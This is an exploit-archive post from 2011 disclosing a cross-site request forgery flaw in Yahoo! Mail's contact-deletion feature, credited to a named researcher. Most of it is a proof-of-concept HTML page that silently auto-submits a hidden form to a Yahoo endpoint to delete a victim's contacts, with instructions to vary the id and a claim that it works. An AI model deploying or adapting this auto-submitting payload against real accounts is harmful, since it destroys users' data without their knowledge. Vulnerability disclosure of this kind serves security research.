Home / exploits Yahoo! Mail Cross Site Request Forgery
Posted on 05 December 2011
======================================================================= YAHOOMAIL CSRF Vulnerability ======================================================================= # Vulnerability found in- Yahoomail Delete Contact module # email prakhar.agrawal26@gmail.com # company AKS IT Services Pvt. Ltd # Credit by Prakar Agrawal # Email Service Yahoomail # Category Mail service # Site p4ge http://www.yahoomail.com # Plateform java # Proof of concept # Targeted URL: http://address.mail.yahoo.com/ Script to Delete the contacts from contact list through Cross Site request forgery . ................................................................................................................ <html> <body> <form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST"> <input type=hidden name="action" value="delete_contacts"> <input type=hidden name="id" value="$Numeric No.$"> </form> <script>document.csrf.submit();</script> </body> </html> . .................................................................................................................. Put any Numeric No. (i.e 1,2,3,4 etc) in id field parameter and try to forge the functionality. its working..... # If you have any questions, comments, or concerns, feel free to contact me.
